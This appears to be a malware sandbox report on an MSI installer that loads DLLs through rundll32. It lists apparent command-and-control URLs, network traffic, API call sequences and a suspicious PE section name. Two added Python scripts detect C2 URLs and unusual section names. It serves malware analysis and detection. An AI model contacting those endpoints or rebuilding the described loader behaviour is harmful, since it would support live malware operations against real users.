Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://ocsp.digicert.com0O
Source: rundll32.exe | String found in binary or memory: http://pconf.f.360.cn/safe_update.php
Source: rundll32.exe | String found in binary or memory: http://pscan.f.360.cn/safe_update.php
Source: rundll32.exe, 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.1995316224.000001FB3C5F0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3238751138.0000000180086000.00000002.00000001.01000000.00000007.sdmp, Update_77697333.dll.6.dr, 360total.dll.1.dr | String found in binary or memory: http://pscan.f.360.cn/safe_update.phphttp://pconf.f.360.cn/safe_update.phphttp://sconf.f.360.cn/clie
Source: rundll32.exe | String found in binary or memory: http://sconf.f.360.cn/client_security_conf
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://t2.symcb.com0
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.dr | String found in binary or memory: http://tl.symcd.com0&
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B23000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137449195.000002473BAB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/
                      Source: rundll32.exe, 00000007.00000003.3137465440.000002473BA70000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin
                      Source: rundll32.exe, 00000007.00000003.3199082000.0000024739B27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/p
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/live/xe
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/vider
                      Source: rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://grizmotras.com/videri
                      Source: rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/
                      Source: rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3239328472.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/1
                      Source: rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/G
                      Source: rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/Y
                      Source: rundll32.exe, 00000007.00000002.3239328472.0000024739AE8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B28000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/
                      Source: rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/K
                      Source: rundll32.exe, 00000007.00000003.3199082000.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137201375.0000024739B56000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137300650.0000024739B56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jarinamaers.shop/live/l
                      Source: rundll32.exe, 00000007.00000003.3137465440.000002473BA70000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.3137449195.000002473BAB0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://pewwhranet.com/live/
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: https://www.advancedinstaller.com
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: https://www.thawte.com/cps0/
                      Source: ad.msi, MSID3EB.tmp.0.dr, MSID498.tmp.0.dr, MSID69B.tmp.1.dr, MSID8B1.tmp.1.dr, MSID509.tmp.0.dr, 5fd5a1.msi.1.dr, MSID529.tmp.0.dr, MSID824.tmp.1.dr, MSID4B9.tmp.0.dr, MSID719.tmp.1.dr, MSID4D9.tmp.0.drString found in binary or memory: https://www.thawte.com/repository0W
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.5:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.5:49718 version: TLS 1.2
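Added example, not part of the Joe Sandbox report: the "String found in binary or memory" rows above are the output of a string scan over rundll32.exe memory, and the trailing characters on many hits (…/live/K, …/live/l, …/G, …/live/URLS1) are what such a scan produces when a NUL-terminated URL is followed by unrelated bytes. The script below runs the same kind of scan over a constructed byte blob modelled on those rows (not a real dump from this analysis), splits the fused URL pair apart, discards the code-signing and installer hosts with an allowlist that is my assumption, and collapses each hit to its scheme, host and directory stem so the Latrodectus endpoints come out with a count per stem.

```python
"""Recover C2 URL candidates from a process memory blob (added example)."""
from __future__ import annotations

import re
from collections import defaultdict

# Constructed sample modelled on the rows above; not a real dump from the analysis.
SAMPLE_DUMP = (
    b"\x00\x00https://grizmotras.com/live/\x00\x90\x90"
    b"https://grizmotras.com/live/p\x00"
    b"https://jarinamaers.shop/live/K\x00\x00"
    b"https://jarinamaers.shop/G\x00"
    b"https://grizmotras.com/live/URLS1https://pewwhranet.com/live/COMMAND4front://sysinfo.bin\x00"
    b"http://ocsp.digicert.com0C\x00"
    b"https://www.advancedinstaller.com\x00"
)

# The host must end in an alphabetic TLD, so "ocsp.digicert.com0C" yields
# ocsp.digicert.com; the path stops at the next embedded scheme, so the fused
# "...URLS1https://pewwhranet.com..." run is split into two URLs.
URL_RE = re.compile(
    rb"(?P<scheme>https?)://"
    rb"(?P<host>[A-Za-z0-9\-]+(?:\.[A-Za-z0-9\-]+)*\.[A-Za-z]{2,})"
    rb"(?P<path>/(?:(?!https?://)[A-Za-z0-9._\-/])*)?"
)

# Assumption: hosts from the installer's code-signing chain are noise, not C2.
BENIGN_HOST_SUFFIXES = (
    "digicert.com", "symcb.com", "symcd.com", "thawte.com", "advancedinstaller.com",
)


def extract_urls(blob: bytes) -> list[str]:
    """Every URL-shaped ASCII run in the blob, in order, noise included."""
    return [m.group(0).decode("ascii") for m in URL_RE.finditer(blob)]


def is_benign(host: str) -> bool:
    return host.endswith(BENIGN_HOST_SUFFIXES)


def c2_candidates(blob: bytes) -> dict[str, int]:
    """Count hits per scheme://host/<directory>.

    Assumption: bytes after the last '/' are residue of adjacent memory, so
    '/live/K', '/live/p' and '/live/URLS1' all collapse to '/live/'.
    """
    counts: dict[str, int] = defaultdict(int)
    for m in URL_RE.finditer(blob):
        host = m.group("host").decode("ascii")
        if is_benign(host):
            continue
        scheme = m.group("scheme").decode("ascii")
        path = (m.group("path") or b"/").decode("ascii")
        stem = path[: path.rfind("/") + 1]
        counts[f"{scheme}://{host}{stem}"] += 1
    return dict(counts)


if __name__ == "__main__":
    for url, n in sorted(c2_candidates(SAMPLE_DUMP).items()):
        print(f"{n:3d}  {url}")
```

On the constructed blob this reports grizmotras.com/live/ three times and jarinamaers.shop and pewwhranet.com once per stem; the two PKI hosts are dropped. Against a real dump, feed the minidump or a `strings`-style extraction as the blob and extend the allowlist with whatever benign hosts the sample's legitimate components embed.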

System Summary

Source: 360total.dll.1.dr | Static PE information: section name: yhDm^
Source: Update_77697333.dll.6.dr | Static PE information: section name: yhDm^
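Added example, not from the report: the static check behind the two "section name: yhDm^" rows above, written against a constructed minimal PE image (DOS stub, COFF header and three section headers, no code) rather than the dropped DLL. The allowed-character set is my assumption; packers and some linkers also emit unusual section names, so treat a hit as a triage signal to pair with the other indicators, not as a verdict on its own.

```python
"""Flag PE section names with unconventional characters (added example)."""
from __future__ import annotations

import struct

# Assumption: a conventional section name uses only these characters; anything
# else (yhDm^, whitespace, high bytes) is reported.
ALLOWED = set(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$")


def section_names(pe: bytes) -> list[bytes]:
    """Return the NUL-trimmed 8-byte names from the section table of a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", pe, coff)
    first = coff + 20 + opt_size  # section table follows the optional header
    names = []
    for i in range(nsec):
        off = first + i * 40  # IMAGE_SECTION_HEADER is 40 bytes; Name is first
        names.append(pe[off:off + 8].rstrip(b"\0"))
    return names


def suspicious_sections(pe: bytes) -> list[bytes]:
    """Names containing any byte outside ALLOWED."""
    return [n for n in section_names(pe) if any(c not in ALLOWED for c in n)]


def build_sample_pe(names: list[bytes]) -> bytes:
    """Constructed minimal PE: just enough header for section_names(), no code."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt = b"\0" * 0xF0  # placeholder optional header; only its size matters here
    coff = struct.pack("<HHIIIHH", 0x8664, len(names), 0, 0, 0, len(opt), 0x2022)
    sections = b"".join(n.ljust(8, b"\0")[:8] + b"\0" * 32 for n in names)
    return dos + b"PE\0\0" + coff + opt + sections


SAMPLE_PE = build_sample_pe([b".text", b".rdata", b"yhDm^"])

if __name__ == "__main__":
    for name in suspicious_sections(SAMPLE_PE):
        print("suspicious section name:", name)
```

To run it on a real dropped file, read the file bytes and pass them to suspicious_sections(); the parser deliberately ignores everything past the section table, so it also works on truncated or partially dumped images as long as the headers are intact.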
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B23C20 GetProcAddress,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,GetLastError,FreeLibrary,5_2_00B23C20
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77B40 NtFreeVirtualMemory,6_2_000001FB3AB77B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77588 RtlInitUnicodeString,NtCreateFile,NtClose,6_2_000001FB3AB77588
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB778C0 NtReadFile,6_2_000001FB3AB778C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77A54 NtWriteFile,6_2_000001FB3AB77A54
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB779C8 NtClose,6_2_000001FB3AB779C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7378C NtClose,6_2_000001FB3AB7378C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB777B0 RtlInitUnicodeString,NtCreateFile,6_2_000001FB3AB777B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7AD34 NtAllocateVirtualMemory,6_2_000001FB3AB7AD34
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7B0C4 NtOpenKey,RtlpNtOpenKey,6_2_000001FB3AB7B0C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,6_2_000001FB3AB7B1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,6_2_000001FB3AB7463C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77ACC NtClose,6_2_000001FB3AB77ACC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77694 RtlInitUnicodeString,NtDeleteFile,6_2_000001FB3AB77694
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7745C RtlInitUnicodeString,NtOpenFile,NtClose,6_2_000001FB3AB7745C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB77704 NtQueryInformationFile,6_2_000001FB3AB77704
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB7CB54 NtDelayExecution,6_2_000001FB3AB7CB54
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB80AC0 NtFreeVirtualMemory,6_2_000001FB3AB80AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB80AF0 NtWriteFile,6_2_000001FB3AB80AF0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB80A90 NtDeleteFile,6_2_000001FB3AB80A90
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000001FB3AB80A78 NtClose,6_2_000001FB3AB80A78
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4CB54 NtDelayExecution,7_2_0000024739A4CB54
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4AD34 NtAllocateVirtualMemory,7_2_0000024739A4AD34
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47B40 NtFreeVirtualMemory,7_2_0000024739A47B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4B0C4 NtOpenKey,RtlpNtOpenKey,7_2_0000024739A4B0C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47A54 NtWriteFile,7_2_0000024739A47A54
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,7_2_0000024739A4463C
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4378C NtClose,7_2_0000024739A4378C
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,7_2_0000024739A4B1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A477B0 RtlInitUnicodeString,NtCreateFile,7_2_0000024739A477B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47704 NtQueryInformationFile,7_2_0000024739A47704
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47694 RtlInitUnicodeString,NtDeleteFile,7_2_0000024739A47694
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A50A90 NtDeleteFile,7_2_0000024739A50A90
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A50A78 NtClose,7_2_0000024739A50A78
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47ACC NtClose,7_2_0000024739A47ACC
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A50AC0 NtFreeVirtualMemory,7_2_0000024739A50AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A478C0 NtReadFile,7_2_0000024739A478C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A4745C RtlInitUnicodeString,NtOpenFile,NtClose,7_2_0000024739A4745C
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A47588 RtlInitUnicodeString,NtCreateFile,NtClose,7_2_0000024739A47588
                      Source: C:\Windows\System32\rundll32.exeCode function: 7_2_0000024739A479C8 NtClose,7_2_0000024739A479C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0AD34 NtAllocateVirtualMemory,8_2_00000210FEA0AD34
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07B40 NtFreeVirtualMemory,8_2_00000210FEA07B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA078C0 NtReadFile,8_2_00000210FEA078C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA10AC0 NtFreeVirtualMemory,8_2_00000210FEA10AC0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0B0C4 NtOpenKey,8_2_00000210FEA0B0C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07ACC NtClose,8_2_00000210FEA07ACC
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07694 RtlInitUnicodeString,NtDeleteFile,8_2_00000210FEA07694
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07704 NtQueryInformationFile,8_2_00000210FEA07704
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,8_2_00000210FEA0463C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07A54 NtWriteFile,8_2_00000210FEA07A54
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0745C RtlInitUnicodeString,NtOpenFile,NtClose,8_2_00000210FEA0745C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA077B0 RtlInitUnicodeString,NtCreateFile,8_2_00000210FEA077B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA079C8 NtClose,8_2_00000210FEA079C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0B1D4 NtQueryValueKey,NtQueryValueKey,NtClose,8_2_00000210FEA0B1D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA07588 RtlInitUnicodeString,NtCreateFile,NtClose,8_2_00000210FEA07588
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0378C NtClose,8_2_00000210FEA0378C
                      Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00000210FEA0CB54 NtDelayExecution,8_2_00000210FEA0CB54
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006A2C8: DeviceIoControl,6_2_000000018006A2C8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,6_2_000000018004B1A4
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\5fd5a1.msiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID69B.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID719.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{B135729E-0574-44D1-B7A1-6E44550F506B}Jump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID824.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSID8B1.tmpJump to behavior
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSID69B.tmpJump to behavior
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B26A505_2_00B26A50
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B5F0325_2_00B5F032
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B592A95_2_00B592A9
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B4C2CA5_2_00B4C2CA
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B4E2705_2_00B4E270
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B584BD5_2_00B584BD
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B4A5875_2_00B4A587
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B5D8D55_2_00B5D8D5
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B2C8705_2_00B2C870
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B449205_2_00B44920
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B4A9155_2_00B4A915
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B50A485_2_00B50A48
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B29CC05_2_00B29CC0
                      Source: C:\Windows\Installer\MSID8B1.tmpCode function: 5_2_00B55D6D5_2_00B55D6D
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180017FE86_2_0000000180017FE8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006DFF46_2_000000018006DFF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800220D86_2_00000001800220D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007C1406_2_000000018007C140
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800601746_2_0000000180060174
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018008023C6_2_000000018008023C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000834C6_2_000000018000834C
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006C4706_2_000000018006C470
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800784E06_2_00000001800784E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800764F06_2_00000001800764F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800605786_2_0000000180060578
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800105806_2_0000000180010580
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004E5DC6_2_000000018004E5DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800626006_2_0000000180062600
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800026106_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800046386_2_0000000180004638
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018004A6506_2_000000018004A650
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006E7606_2_000000018006E760
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800647B06_2_00000001800647B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018007E7C76_2_000000018007E7C7
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800769306_2_0000000180076930
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800629546_2_0000000180062954
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006A9946_2_000000018006A994
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018006E9FC6_2_000000018006E9FC
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180082A186_2_0000000180082A18
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180072A276_2_0000000180072A27
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180010B586_2_0000000180010B58
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180026C846_2_0000000180026C84
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018001ECF46_2_000000018001ECF4
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000180008E206_2_0000000180008E20
